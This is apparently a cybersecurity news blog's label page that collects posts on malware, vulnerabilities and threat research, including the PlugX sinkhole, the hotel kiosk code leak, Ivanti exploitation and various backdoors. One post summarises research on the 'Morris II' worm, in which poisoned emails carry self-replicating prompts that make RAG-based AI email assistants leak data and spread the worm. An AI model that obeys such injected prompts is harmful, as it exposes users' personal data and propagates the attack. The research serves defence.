Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Researchers. Show all posts

Researchers Successfully Sinkhole PlugX Malware Server, Recording 2.5 Million Unique IPs

 

Researchers successfully seized control of a command and control (C2) server linked to a variant of the PlugX malware, effectively halting its malicious operations. Over the span of six months, more than 2.5 million connections were logged from diverse IP addresses worldwide.

Beginning in September 2023, cybersecurity firm Sekoia took action upon identifying the unique IP address associated with the C2 server. Their efforts resulted in the logging of over 2.4 million unique IP addresses from 170 countries, allowing for comprehensive analysis of the malware's spread and the development of effective countermeasures.

The acquisition of the C2 server's IP address, at the cost of $7, was facilitated by Sekoia's researchers. Following this, they gained shell access to the server and set up a mimicry of the original C2 server's behavior. This enabled the capture of HTTP requests from infected hosts and provided insights into the malware's activities.

The sinkhole operation revealed a daily influx of between 90,000 to 100,000 requests from infected systems, originating from various locations worldwide. Notably, certain countries accounted for a significant portion of the infections, with Nigeria, India, China, and the United States among the most affected.

Despite the challenges posed by the malware's lack of unique identifiers and its ability to spread through various means, Sekoia's researchers identified potential strategic interests, particularly in regions associated with China's Belt and Road Initiative.

To address the widespread infection, Sekoia proposed two strategies for disinfection, urging national cybersecurity teams and law enforcement agencies to collaborate. One approach involves sending self-delete commands supported by PlugX, while the other entails the development and deployment of custom payloads to eradicate the malware from infected systems and USB drives.

While the sinkhole operation effectively neutralized the botnet controlled by PlugX, Sekoia warned of the possibility of its revival by malicious actors with access to the C2 server.

PlugX, initially linked to state-sponsored Chinese operations, has evolved into a widely used tool by various threat actors since its emergence in 2008. Its extensive capabilities and recent wormable features pose significant security risks, necessitating collaborative efforts to mitigate its impact.

Room for Error: Hotel Check-In Terminal Flaw Leads to Access Code Leak

 


Ibis Budget hotels in Germany were found to leak hotel room key codes through self-service check-in terminals, and a researcher behind the discovery claims the problem could potentially affect hotels around the world. It would be very easy for anyone to abuse the terminal's security flaw without any technical knowledge or specialized tools, as it is a security flaw that can be exploited by anyone. 

In actuality, an attacker can aggregate a whole lot of room keycodes in just a few minutes as long as a regular customer uses the same machine to check into their room, as long as the attacker is persistent. In addition to speaking with staff at the front desk, hotel guests can also take advantage of self-service check-in terminals. Front desk staff can be unavailable at times for guests to interact with them. 

These terminals offer guests the ability to not only check into their rooms, but they can also search for information about existing bookings as well, which is what Ibis Budget is all about. Based on the company's website, 600 Ibis Budget hotels are operating in 20 different countries around the world. This is an Ibis Budget hotel chain owned by Accor. 

They believe the vulnerability likely affected other hotels as well, as they discovered in late 2023 a security flaw in the self-check-in terminal that was installed at an Ibis Budget hotel in Germany.  Ibis Budget hotel customers can use these kiosks to check in their rooms when there is no staff at the hotel. 

When Accor was notified, Pentagrid was informed that the company had issued patches to the affected devices within a month. Upon entering the booking ID, the terminal displays the associated room number as well as the keypad code that can be used to access the room when the customer is not present. 

The customer then has to enter the keypad code to access the room.    It was discovered by Pentagrid that a list of current bookings could be displayed on the terminal if he entered a series of dashes instead of the booking ID. Pentagrid believes that tapping on a booking will display the room number as well as the keypad access code of the hotel, which remains unchanged during the guest's stay at the hotel, according to Pentagrid. 

There was a chance that an attacker would have been able to gain access to rooms using the exposed access codes. Upon entering the dashes, the booking information displayed the amount of the booking, the room number and the valid room entry code, along with the cost of the booking. The researchers also found a timestamp in the data, which the researchers assumed was the check-in date, which could indicate the length of the guest's stay.

Schobert discovered the issue unintentionally after attending a cybersecurity convention in Hamburg, where he was using a terminal at the Altona Ibis Budget Hotel. The bug is not clear as to whether or not 87 bookings were valid at the time of the audit, as there are 180 rooms at the hotel. It is unclear if it was only 87 bookings that were valid at that time or if the bug was limited to returning less than the entire number of bookings. 

Schobert said the booking references could still be found on discarded printouts even without the exploit by using a series of dashes, which necessitated that greater security controls be placed on the terminals to prevent this. If this issue falls into the wrong hands, the consequences could be quite serious.

Understandably, retrieving keycodes could lead to theft, but being able to target rooms by price may allow an attacker to target the wealthiest guests for the best possible rewards as they may be able to target rooms by price. Aside from theft, there is also the danger of stalking and other creeps abusing guests, which may put their safety at risk. As a result, researchers note that an attacker would have needed to be physically close to the targeted terminal to exploit the vulnerability, as the affected device would have had to be set up to allow self-service, which would be most likely during the nighttime, researchers stated. 

Researchers Uncover Numerous Chinese Hacker Collectives Exploiting Ivanti Security Vulnerabilities

 

Several threat actors with connections to China have been identified as responsible for exploiting three security vulnerabilities affecting Ivanti appliances. These vulnerabilities are identified as CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893.

Mandiant, a cybersecurity firm, has been monitoring these clusters of threat actors, identifying them under the names UNC5221, UNC5266, UNC5291, UNC5325, UNC5330, and UNC5337. Among them, UNC3886, a Chinese hacking group, has been previously known for exploiting zero-day bugs in Fortinet and VMware systems to infiltrate networks.

Financially motivated actors have also been observed exploiting CVE-2023-46805 and CVE-2024-21887, likely for cryptocurrency mining purposes.

UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments," Mandiant researchers said

Post-exploitation activities by these threat actors often involve deploying malicious tools such as the Sliver command-and-control framework, WARPWIRE credential stealer variant, and a new backdoor named TERRIBLETEA, which comes with various functionalities like command execution and keylogging.

UNC5330 has been combining CVE-2024-21893 and CVE-2024-21887 to target Ivanti Connect Secure VPN appliances, leveraging custom malware like TONERJAM and PHANTOMNET for further actions. These include reconnaissance, lateral movement, and compromising LDAP bind accounts for higher privileges.

UNC5337, another China-linked group, has been using CVE-2023-46805 and CVE-2024-218 to infiltrate Ivanti devices since January 2024, deploying a custom malware toolset known as SPAWN. This toolset includes components like SPAWNSNAIL, SPAWNMOLE, SPAWNANT, and SPAWNSLOTH, designed for stealthy and persistent backdoor access.

Mandiant assesses with medium confidence that UNC5337 and UNC5221 might be the same group, highlighting the sophistication of their tools aimed at avoiding detection.

UNC5221 has also been associated with various web shells and a Perl-based web shell called ROOTROT, which is embedded into legitimate files to evade detection. Successful deployment of these shells leads to network reconnaissance and lateral movement, potentially compromising vCenter servers with a Golang backdoor named BRICKSTORM.

Finally, UNC5291, likely associated with another group called UNC3236, has been targeting academic, energy, defense, and health sectors, focusing on Citrix Netscaler ADC initially before shifting to Ivanti Connect Secure devices.

These findings emphasize the ongoing threat posed by edge appliances, with threat actors utilizing a combination of zero-day vulnerabilities, open-source tools, and custom backdoors to evade detection and maintain access to networks for extended periods. access to target systems.

Researchers Develop AI "Worms" Capable of Inter-System Spread, Enabling Data Theft Along the Way

 

A team of researchers has developed a self-replicating computer worm designed to target AI-powered applications like Gemini Pro, ChatGPT 4.0, and LLaVA. The aim of this project was to showcase the vulnerabilities in AI-enabled systems, particularly how interconnections between generative-AI platforms can facilitate the spread of malware.

The researchers, consisting of Stav Cohen from the Israel Institute of Technology, Ben Nassi from Cornell Tech, and Ron Bitton from Intuit, dubbed their creation 'Morris II', drawing inspiration from the infamous 1988 internet worm.

Their worm was designed with three main objectives. Firstly, it was engineered to replicate itself using adversarial self-replicating prompts, which exploit the AI applications' tendency to output the original prompt, thereby perpetuating the worm. 

Secondly, it aimed to carry out various malicious activities, ranging from data theft to the creation of inflammatory emails for propagandistic purposes. Lastly, it needed the capability to traverse hosts and AI applications to proliferate within the AI ecosystem.

The worm utilizes two primary methods for propagation. The first method targets AI-assisted email applications employing retrieval-augmented generation (RAG), where a poisoned email triggers the generation of a reply containing the worm, subsequently spreading it to other hosts. The second method involves inputs to generative-AI models, prompting them to create outputs that further disseminate the worm to new hosts.

During testing, the worm successfully pilfered sensitive information such as social security numbers and credit card details.

To raise awareness about the potential risks posed by such worms, the researchers shared their findings with Google and OpenAI. While Google declined to comment, an OpenAI spokesperson acknowledged the potential exploitability of prompt-injection vulnerabilities resulting from unchecked or unfiltered user inputs.

Instances like these underscore the imperative for increased research, testing, and regulation in the deployment of generative-AI applications.

Researchers Develop 'VoltSchemer' Assaults Aimed at Wireless Charging Systems

 

A team of researchers from the University of Florida, collaborating with CertiK, a Web3 smart contract auditor, have uncovered potential security threats in wireless charging systems. Their research introduces new attack methods, named VoltSchemer, which exploit vulnerabilities in these systems by manipulating power supply voltages.

The VoltSchemer attacks, outlined in a research paper, target weaknesses in wireless charging setups, allowing attackers to disrupt charging devices, tamper with voice assistants, and override safety mechanisms outlined in the Qi standard. Notably, these attacks utilize voltage fluctuations from the power source, requiring no direct modifications to the chargers themselves.

While wireless chargers are generally considered more secure than wired alternatives due to their reliance on near-field magnetic coupling, the researchers argue that they are still susceptible to manipulation. By tampering with power signals, attackers could potentially compromise communication between the charger and the device being charged, leading to malicious actions.

The underlying issue lies in the susceptibility of wireless chargers to electromagnetic interference (EMI) caused by voltage fluctuations. This interference can modulate the power signals transmitted by the charger, enabling attackers to manipulate the magnetic field produced and issue unauthorized commands to connected devices.

In their experiments, the researchers tested the VoltSchemer attacks on nine commercially available wireless chargers, all of which were found to be vulnerable. By inserting a disguised voltage manipulation device, such as a modified power port, between the power adapter and the charger, the researchers successfully executed the attacks.

The consequences of these attacks were significant, with charging smartphones experiencing overheating and devices such as key fobs, USB drives, SSD drives, and NFC cards being permanently damaged or destroyed. The researchers emphasize that the root cause of these vulnerabilities lies in the lack of effective noise suppression in certain frequency bands within wireless charging systems.

Overall, the findings highlight the potential risks associated with wireless charging technologies and underscore the need for improved security measures, especially in high-power systems like electric vehicle (EV) wireless charging.

Researchers Claim Apple Was Aware of AirDrop User Identification and Tracking Risks Since 2019

Security researchers had reportedly alerted Apple about vulnerabilities in its AirDrop wireless sharing feature back in 2019. According to these researchers, Chinese authorities recently exploited these vulnerabilities to track users of the AirDrop function. This case has raised concerns about global privacy implications.

The Chinese government allegedly used the compromised AirDrop feature to identify users on the Beijing subway accused of sharing "inappropriate information." The exploit has prompted internet freedom advocates to urge Apple to address the issue promptly and transparently. Pro-democracy activists in Hong Kong have previously used AirDrop, leading to Chinese authorities cracking down on the feature.

Beijing-based Wangshendongjian Technology claimed to have compromised AirDrop, collecting basic identifying information such as device names, email addresses, and phone numbers. Despite Chinese officials presenting this as an effective law enforcement technique, there are calls for Apple to take swift action.

US lawmakers, including Florida Sen. Marco Rubio, have expressed concern about the security of Apple's AirDrop function, calling on the tech giant to act promptly. However, Apple has not responded to requests for comments on the matter.

Researchers from Germany's Technical University of Darmstadt, who identified the flaws in 2019, stated that Apple received their report but did not act on the findings. The researchers proposed a fix in 2021, which Apple has allegedly not implemented.

The Chinese claim has raised alarms among US lawmakers, emphasizing the need for Apple to address security issues promptly. Critics argue that Apple's inaction may be exploited by authoritarian regimes, highlighting the broader implications of tech companies' relationships with such governments.

The Chinese tech firm's exploitation of AirDrop apparently utilized techniques identified by the German researchers in 2019. Experts point out that Apple's failure to add an extra layer of security, known as "salting," allowed the unauthorized access of device-identifying information.

Security experts emphasize that while AirDrop's device-to-device communication is generally secure, users may be vulnerable if they connect with a stranger or accept unsolicited connection requests. The lack of salting in the encryption process makes it easier for unauthorized parties to decipher the exchanged data.

Following the Chinese claim, Senator Ron Wyden criticized Apple for a "blatant failure" to protect users, emphasizing the four-year delay in addressing the security hole in AirDrop. The tech firm behind the AirDrop exploit has a history of collaboration with Chinese law enforcement and security authorities.

The intentional disclosure of the exploit by Chinese officials may serve various motives, including discouraging dissidents from using AirDrop. Experts suggest that Apple may now face challenges in fixing the issue due to potential retaliation from Chinese authorities, given the company's significant presence in the Chinese market. The hack revelation could also provide China with leverage to compel Apple's cooperation with security or intelligence demands.

A Few Cybercriminals Account for All Email Extortion Attacks, New Research Reveals

 

New research conducted by Barracuda Networks, in collaboration with Columbia University, has revealed that a surprisingly small group of cybercriminals is responsible for the majority of email extortion attempts worldwide. The study examined over 300,000 flagged emails, identified as extortion attacks by the company's AI detectors, over a one-year period.

To estimate the findings, the researchers traced the bitcoin wallet addresses provided in the emails, as cybercriminals often prefer this method of payment due to the anonymity and ease of transactions in the cryptocurrency realm.

However, the number of bitcoin addresses doesn't necessarily indicate the exact number of attackers. According to Columbia Master's student Zixi (Claire) Wang, who authored the report, the actual number of attackers is likely even fewer than 100, as attackers often use multiple bitcoin addresses.

The monetary demands in these email attacks were relatively low, with approximately a quarter of the emails requesting less than $1,000 and over 90% asking for less than $2,000. Wang speculates that cybercriminals opt for smaller amounts to avoid raising suspicion with victims' banks or tax authorities, and victims are more likely to comply with lower demands without investigating the legitimacy of the threat.

The researchers also observed that Bitcoin was the sole cryptocurrency used by the attackers in their dataset. Wang suggests this is because Bitcoin offers a high level of anonymity, allowing anyone to generate numerous wallet addresses.

The common scams employed by the attackers involved claims of possessing compromising photos or videos obtained by hacking the target's device camera. These threats aimed to extort money from victims under the threat of releasing the alleged content. However, the research revealed that the majority of attackers were bluffing and had no such incriminating material or infected the target systems with malware.

The silver lining in this research is that the small number of perpetrators worldwide could be advantageous for law enforcement efforts. Wang believes that tracking down even a few of these attackers could significantly disrupt this cyber threat.

Furthermore, given the similarity in tactics and templates used by extortion attackers, Wang suggests that email security vendors could block a substantial portion of these attacks using relatively simple detectors. This could provide an additional layer of protection against such cyber threats.

Cyberspies Drop New Infostealer Malware on Govt Networks in Asia

 

Security researchers have discovered new cyber-espionage activity targeting Asian governments, as well as state-owned aerospace and defence companies, telecom companies, and IT organisations.
The threat group behind this action is a different cluster earlier associated with the "ShadowPad" RAT (remote access trojan) (remote access trojan). In recent campaigns, the threat actor used a much broader set of tools.

As per a report by Symantec's Threat Hunter team that dives into the activity, the intelligence-gathering attacks have been underway since at least early 2021 and are still ongoing. The current campaign appears to be almost entirely focused on Asian governments or public entities, such as:
  • Head of government/Prime Minister's office
  • Government institutions linked to finance
  • Government-owned aerospace and defense companies
  • State-owned telecoms companies
  • State-owned IT organizations
  • State-owned media companies
Symantec uses an example of an April 2022 attack to demonstrate how the espionage group breaches its government targets. The attack starts with the installation of a malicious DLL that is side-loaded by launching the executable of a legitimate application in order to load a.dat file.

The legitimate application abused by the hackers, in this case, was an 11-year-old Bitdefender Crash Handler executable. The initial.dat payload contains encrypted shellcode that can be used to directly execute commands or additional payloads from memory.

The threat actors installed ProcDump three days after gaining backdoor access to steal user credentials from the Local Security Authority Server Service (LSASS). The LadonGo penetration testing framework was side-loaded via DLL hijacking on the same day and used for network reconnaissance.

The attackers returned to the compromised machine two weeks later to install Mimikatz, a popular credential stealing tool.
Furthermore, the hackers attempted to elevate their privileges by exploiting CVE-2020-1472 (Netlogon) against two computers on the same network.

To load payloads on additional computers in the network, the attackers used PsExec to execute Crash Handler and the DLL order hijacking trick. A month after the intrusion, the threat actors gained access to the active directory server and mounted a snapshot to access user credentials and log files.

Finally, Symantec observed the use of Fscan to attempt CVE-2021-26855 (Proxylogon) exploitation against Exchange Servers in the compromised network.

Alert! Teen Hackers are Using Discord to Disseminate Malware

 

Avast security researchers found a Discord channel where a group of teenagers is developing, updating, promoting, and selling malware and ransomware outbreaks, allegedly to make pocket money. 

The researchers assume they are all minors since they referenced their parents and instructors frequently and casually used age-specific slurs. Researchers discovered their actions via their Discord chat. The hackers sell malware variants of Snatch, Lunar, and Rift and provide a variety of services ranging from data theft to ransomware and crypto mining. 

However, researchers discovered that teen hackers mostly give easy-to-use malware builders and toolkits, allowing users to utilise them without real programming by using the "Do it yourself" (DIY) technique. 

How does the Group function? 

To become a group member or utilise the malware-as-a-service capability, interested parties must pay a charge. The registration price ranges from €5 to €25. Avast researchers observed in their analysis that about 100 accounts have already enrolled to get access to a hacking group. The malware dissemination method is a little unusual. 

The hackers posted a YouTube video displaying a bogus crack for a popular computer game or commercial software, along with a download link in the description. To establish credibility, additional users of the Discord group leave comments on the video, thanking the originator and confirming that the connection works. This method is even more twisted than bots for commenting since it becomes hard to recognise. 

How Should One Handle Teen Hackers? 

This scenario is undoubtedly troubling. As a result, hacking ability among teenagers and minors must be channelled towards beneficial, ethical endeavours for the general benefit of the cybersecurity sector. 

Parents must communicate to their children to understand the motivational elements that drive them to distribute malware. There are several tools accessible on Discord and other platforms to assist anyone interested in pursuing a career in the cybersecurity field. 

The first step, though, is for parents to interact with their children without passing judgement. It is worth emphasising that the organisation distributes unlawful malware without comprehending the gravity of the situation and dismissing it as a prank.

New Emotet Variant Capturing Users' Credit Card Data from Google Chrome

 

The infamous Emotet malware has deployed a new module aimed to steal credit card data saved in the Chrome web browser. According to corporate security firm Proofpoint, which discovered the component on June 6, the credit card stealer, which only targets Chrome, has the capacity to exfiltrate the acquired information to several remote command-and-control (C2) servers. 

The news comes amid a surge in Emotet activity since it was reactivated late last year after a 10-month pause caused by a law enforcement operation that destroyed its attack infrastructure in January 2021. Emotet, attributed to the threat actor TA542 (aka Mummy Spider or Gold Crestwood), is a sophisticated, self-propagating, and modular trojan that is distributed via email campaigns. 

According to Check Point, as of April 2022, Emotet is still the most renowned malware, with a global impact of 6% of organisations worldwide, followed by Formbook and Agent Tesla, with the malware testing new delivery methods using OneDrive URLs and PowerShell in.LNK attachments to circumvent Microsoft's macro restrictions. 

The steady increase in Emotet-related threats is further supported by the fact that the number of phishing emails, which frequently hijack existing correspondence, increased from 3,000 in February 2022 to approximately 30,000 in March, targeting organisations in various countries as part of a large-scale spam campaign. ESET stated that Emotet activity "shifted to a higher gear" in March and April 2022 and that detections increased 100-fold, indicating an 11,000 percent increase during the first four months of the year when compared to the preceding three-month period from September to December 2021. 

Japan, Italy, and Mexico have been frequent targets since the botnet's revival, according to the Slovak cybersecurity firm, with the largest wave recorded on March 16, 2022. 

DuÅ¡an Lacika, the senior detection engineer at DuÅ¡an Lacika, said, "The size of Emotet's latest LNK and XLL campaigns was significantly smaller than those distributed via compromised DOC files seen in March. This suggests that the operators are only using a fraction of the botnet's potential while testing new distribution vectors that could replace the now disabled-by-default VBA macros." 

Researchers from CyberArk also revealed a novel approach for extracting plaintext credentials directly from memory in Chromium-based web browsers. 

"Credential data is stored in Chrome's memory in cleartext format. In addition to data that is dynamically entered when signing into specific web applications, an attacker can cause the browser to load into memory all the passwords that are stored in the password manager," CyberArk's Zeev Ben Porat said.

This includes cookie-related information such as session cookies, which an attacker might harvest and utilise to hijack users' accounts even if they are secured by multi-factor authentication.

This New Raspberry Robin Worm Utilizes Windows Installer to Drop Malware

 

A new Windows malware with worm capabilities has been identified by Red Canary intelligence investigators, and it spreads via external USB sticks. This malware is associated with the Raspberry Robin malware cluster, which was initially discovered in September 2021. (cybersecurity firm Sekoia tracks this malware as "QNAP worm"). 

The worm was discovered in many customers' networks by Red Canary's Detection Engineering team, including companies in the technology and manufacturing sectors. When a USB drive carrying a malicious.LNK file is attached, Raspberry Robin spreads to new Windows systems.

The worm launches a new process using cmd.exe to launch a malicious file stored on the infected drive after it has been attached. It reaches out to its command-and-control (C2) servers via Microsoft Standard Installer (msiexec.exe), which are most likely hosted on infected QNAP devices and utilise TOR exit nodes as additional C2 infrastructure. 

The researchers said, "While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes." 

They believe the malware downloads a malicious DLL file [1, 2] on affected workstations to resist eradication between restarts, albeit they haven't determined how it achieves persistence. This DLL is started by Raspberry Robin using two other trusted Windows utilities: fodhelper (a trusted binary for controlling features in Windows settings) and odbcconf (a tool for configuring ODBC drivers). 

The first permits it to get through User Account Control (UAC), while the second assists in the execution and configuration of the DLL. While Red Canary analysts have been able to extensively examine what the newly found malware performs on affected systems, some questions remain unanswered. 

The researchers stated, "First and foremost, we don't know how or where Raspberry Robin infects external drives to perpetuate its activity, though it's likely this occurs offline or otherwise outside of our visibility. We also don't know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis." 

Red Canary's report contains more technical details on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK of this malware.

Google Researchers: 'Zero-Day’ Hacks Hit Record in 2021

 

Following a year marked by high-profile ransomware assaults and supply-chain hacks, Google researchers have uncovered another alarming cyber milepost for 2021: a record number of "zero-day" exploits. A zero-day exploit is a previously undisclosed flaw that gives software developers exactly 0 days to fix it. As a result, the technology in question is extremely lucrative to hackers - and a disaster for cyber-security experts. 

According to a report released Tuesday (April 19) by Google's Project Zero, a team of specialist bug hunters, hackers attacked a total of 58 zero-day defects affecting key software suppliers in 2021. In 2020, there were 25 flaws, compared to 21 in 2019. Since Project Zero began tracking zero-days in 2014, this is the largest number of zero-days ever recorded. 

Ms Maddie Stone, a security researcher at Project Zero, stated in a blog post about the findings that the trend could be attributed to an enhancement in identification from companies like Microsoft, Apple, and Google, who now publicly report their findings around zero-day concerns, rather than a spike in hacks. 

Hackers have utilized the attack approach in recent years to install powerful spyware on smartphones, which has then been used to spy on journalists, lawmakers, human rights activists, and others. Last year, suspected Chinese state-sponsored hackers used such vulnerabilities to compromise Microsoft Exchange servers. 

Ms Stone of Google stated that the data contained some surprises. Despite the recent attention on spyware abuse, cyber-security researchers are still unable to find zero-day vulnerabilities that allow hackers to exploit systems. 

She wrote, "We know that messaging applications like WhatsApp, Signal, Telegram, etc are targets of interest to attackers and yet there's only one messaging app, in this case, iMessage, zero-day found this past year." 

Since 2014, the team has discovered two such flaws, one in WhatsApp in 2019 and the other in iMessage in 2021. According to Ms Stone, the majority of individuals on the planet are not at risk of being targeted by a zero-day attack. 

Nonetheless, she believes that such attacks have a widespread influence. "These zero-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful."

Researchers Disclosed Details of NSA Equation Group’s Bvp47 Backdoor

 

Pangu Lab researchers have revealed information of a Linux top-tier APT backdoor dubbed as Bvp47, which is linked to the US National Security Agency (NSA) Equation Group. 

The term "Bvp47" is derived from several references to the string "Bvp" and the numerical figure "0x47" used in the encryption algorithm. The Bvp47 backdoor was first identified in 2013 during a forensic examination into a security breach at a Chinese government entity. The backdoor was discovered on Linux computers after an in-depth forensic assessment of a host in a key domestic department, according to the experts. The malware seemed to be a top-tier APT backdoor, but to further investigate the malicious code needed the attacker’s asymmetric encrypted private key to activate the remote control function.

The hacking group, The Shadow Brokers disclosed a trove of data reportedly taken from the Equation Group in 2016 and 2017, including a slew of hacking tools and exploits. The hackers disclosed a new dump at the end of October 2016, this time featuring a list of systems compromised by the NSA-linked Equation Group. The Bvp47 backdoor was identified by Pangu Lab researchers within material exposed by The Shadow Brokers. In ten years, the Equation Group attacked over 287 targets in 45 countries, including Russia, Japan, Spain, Germany, and Italy, according to stolen data. 

Governments, telecommunications, aircraft, energy, financial institutions, nuclear research, oil and gas, military, transportation, and companies researching encryption technologies were among the industries targeted by the group. The attacks involving the Bvp47 backdoor have been termed "Operation Telescreen" by Pangu Lab. The malicious code was created to allow operators to gain long-term control over compromised devices. 

The report published by the experts stated, “The implementation of Bvp47 includes complex code, segment encryption and decryption, Linux multi-version platform adaptation, rich rootkit anti-tracking techniques, and most importantly, it integrates advanced BPF engine used in advanced covert channels, as well as cumbersome communication encryption and decryption process”  

Experts believe there was no security against the backdoor's network attack capacity, which is loaded with zero-day vulnerabilities. The Pangu Lab research covers technical specifics about the backdoor as well as information about the Equation Group's relationship with the US National Security Agency. The Equation Group's engagement is based on exploits found in the encrypted archive file "eqgrp-auction-file.tar.xz.gpg" released by the Shadow Brokers following a failed 2016 auction.

By Attacking Healthcare, Education, and Government Systems, FritzFrog Botnet Grew Tenfold

 

The FritzFrog botnet, which has been active for over two years, has revived with an alarming infection rate, growing tenfold in just a month of attacking healthcare, education, and government networks via an unprotected SSH server. FritzFrog, a malware developed in Golang that was discovered in August 2020, is both a worm and a botnet that targets the government, education, and finance sectors. 

The malware fully assembles and executes the malicious payload in memory, making it volatile. Furthermore, because of its unique P2P implementation, there is no central Command & Control (C&C) server giving commands to FritzFrog. It is self-sufficient and decentralised. Despite FritzFrog's harsh brute-force tactics for breaching SSH servers, it is strangely efficient at targeting a network equitably. 

Guardicore Labs has been monitoring FritzFrog with its honeypot network for some time. "We started monitoring the campaign’s activity, which rose steadily and significantly with time, reaching an overall of 13k attacks on Guardicore Global Sensors Network (GGSN). Since its first appearance, we identified 20 different versions of the Fritzfrog binary," said the company in a report published in August 2020, authored by security researcher Ophir Harpaz.

Researchers at internet security firm Akamai discovered a new version of the FritzFrog malware, which has intriguing new features such as the use of the Tor proxy chain. The new botnet variation also reveals signs of its operators planning to enhance capabilities to target WordPress servers. 

Athough the Akamai global network of sensors identified 24,000 attacks, the botnet has claimed only 1,500 victims thus far. The majority of infected hosts are in China, although affected systems can also be found in a European TV network, a Russian healthcare organisation, and other East Asian universities. The perpetrators have included a filtering list to avoid low-powered devices like Raspberry Pi boards, and the malware also includes code that lays the basis for targeting WordPress sites. 

Given that the botnet is renowned for cryptocurrency mining, this feature is an odd inclusion. However, Akamai believes that the attackers have discovered new means of monetization, such as the deployment of ransomware or data leaks. This functionality is currently dormant while it is being developed. The researchers point out that FritzFrog is always in development, with bugs being resolved on a daily basis. 

FritzFrog targets any device that exposes an SSH server, therefore administrators of data centre servers, cloud instances, and routers must be careful, according to the researchers. Some security tips from Akamai include enabling system login auditing with alerting, monitoring the authorized_hosts file on Linux, configuring an explicit allow list for SSH login, and so on.

CoinStomp Malware is Aimed at Asian Cloud Service Providers

 

Researchers have uncovered a new malware family that mines cryptocurrencies using cloud services. According to Cado Security, the malware, dubbed CoinStomp, is comprised of shell scripts that "try to target cloud compute instances hosted by cloud service providers for the purpose of mining cryptocurrencies." According to the company's researchers, the overall goal of CoinStomp is to silently breach instances in order to harness computational resources to illicitly mine for cryptocurrency, a type of attack known as cryptojacking. 

So far, a handful of attacks have targeted cloud service companies in Asia. Clues in code also referenced Xanthe, a cryptojacking threat group previously linked to the Abcbot botnet. However, the clue – found in a defunct payload URL – is insufficient to determine who is behind CoinStomp and may have been included in an "attempt to dodge attribution," according to the team. 

CoinStomp includes a variety of intriguing features. One example is its reliance on "timestomping." Timestomping is the process of modifying the timestamps of files dumped or used during a malware attack. This approach is commonly used as an anti-forensics strategy to confound investigators and thwart remedial efforts. Although the Rocke gang has previously utilized timestomping in cryptojacking assaults, it is not a common technique. On Linux, timestomping is simple with the -t flag of the touch command. 

"It seems likely that timestomping was employed to obfuscate usage of the chmod and chattr utilities, as forensic tools would display the copied versions of these binaries as being last accessed (executed) at the timestamp used in the touch command," Cado Security noted. 

Furthermore, the malware will attempt to mess with the cryptographic policies of Linux servers. Because these policies can prevent malicious executables from being dumped or run, the creator of CoinStomp has included options to disable system-wide cryptographic policies via a kill command. "This could undo attempts to harden the target machine by administrators, ensuring that the malware achieves its objectives," the researchers say. 

CoinStomp will then use a reverse shell to connect to its command-and-control (C2) server. The script then downloads and runs additional payloads as system-wide systemd services with root access. These include binaries that might be used to develop backdoors and a customized version of XMRig, which is genuine Monero mining software that has been abused for criminal purposes.

Emotet Spam Campaigns Use Unconventional IP Addresses to Avoid Detection

 

Trend Micro discovered Emotet spam campaigns that used hexadecimal and octal representations of IP addresses to avoid detection using pattern matching. Both processes rely on social engineering to deceive users into enabling document macros and automate malware execution. When these standards are received, operating systems (OS) automatically transform the data to the dotted decimal quad representation in order to commence the request from remote servers.

Users and enterprises are advised to detect, block, and enable the appropriate security measures to prevent compromise while using Emotet for second-stage malware transmission such as TrickBot and Cobalt Strike. 

Emotet first surfaced in 2014, when researchers found a relatively simple banking Trojan transmitted via phishing emails. It evolved several times over the years into a Malware-as-a-Service botnet, allowing access to compromised computers to those willing to pay. Unfortunately, there were a plethora of them, including ransomware gangs like Ryuk and the data-stealing malware Trickbot. These immediately took advantage of the initial access provided by Emotet, picking and choosing which victims to target with subsequent payloads. 

According to Europol, Emotet's capability to move laterally among devices on a network made it one of the most durable pieces of malware detected in recent years. In reality, it has become one of the most serious threats researchers have seen in recent years, constantly ranking among the top ten campaigns detected, with over 1.6 million victim machines, according to the DoJ. 

The samples researchers discovered begin with an email-attached document that employs Excel 4.0 Macros, an antiquated technology intended to automate repetitive processes in Excel that malicious actors have exploited to distribute malware. In this scenario, abusing the feature allows the malware to execute once the document is opened using the auto-open macro. Carets are used to obfuscate the URL, and the host contains a hexadecimal representation of the IP address. 

When the macro is run, it invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which downloads and executes HTML application (HTA) code from the remote host. 

Between November and December 2021, traces of Emotet were seen arbitrarily dropping Cobalt Strike beacons. However, during this year, operators were notably more picky about which targets the beacons were dropped on. Evasion strategies like this could be interpreted as proof that attackers are continuing to innovate in order to defeat pattern-based detection technologies. Furthermore, the atypical use of hexadecimal and octal IP addresses may result in evasion of current solutions reliant on pattern matching.

SysJoker, a New Backdoor for Windows, macOS, and Linux has been Discovered

 

A new multi-platform backdoor malware known as 'SysJoker' has been discovered in the wild, targeting Windows, Linux, and macOS and capable of evading detection on all three platforms. SysJoker was identified during an active attack on a renowned educational institution's Linux-based web server.

Researchers discovered that SysJoker also has Mach-O and Windows PE versions after further examination. They believe that the SysJoker attack began in the second half of 2021, based on C2 domain registration and samples detected in VirusTotal. 

SysJoker disguises itself as a system update and creates its C2 by decoding a string from a text file housed on Google Drive. The C2 changed three times during Intezer's analysis, showing that the attacker was active and monitoring for affected machines. 

Intezer believes SysJoker is targeting certain targets based on victimology and malware behavior. SysJoker was submitted to VirusTotal with the TypeScript file extension .ts. An infected npm package could be used as an attack vector for this malware. 

The malware is written in C++, and while each variant is customized for the targeted operating system, they all go undetected by VirusTotal, a malware scanning website that employs 57 different antivirus detection engines. On Windows, SysJoker deploys a first-stage dropper in the form of a DLL that uses PowerShell commands to perform tasks such as fetching the SysJoker ZIP from a GitHub repository, unzipping it on “C:\ProgramData\RecoverySystem\” and executing the payload. 

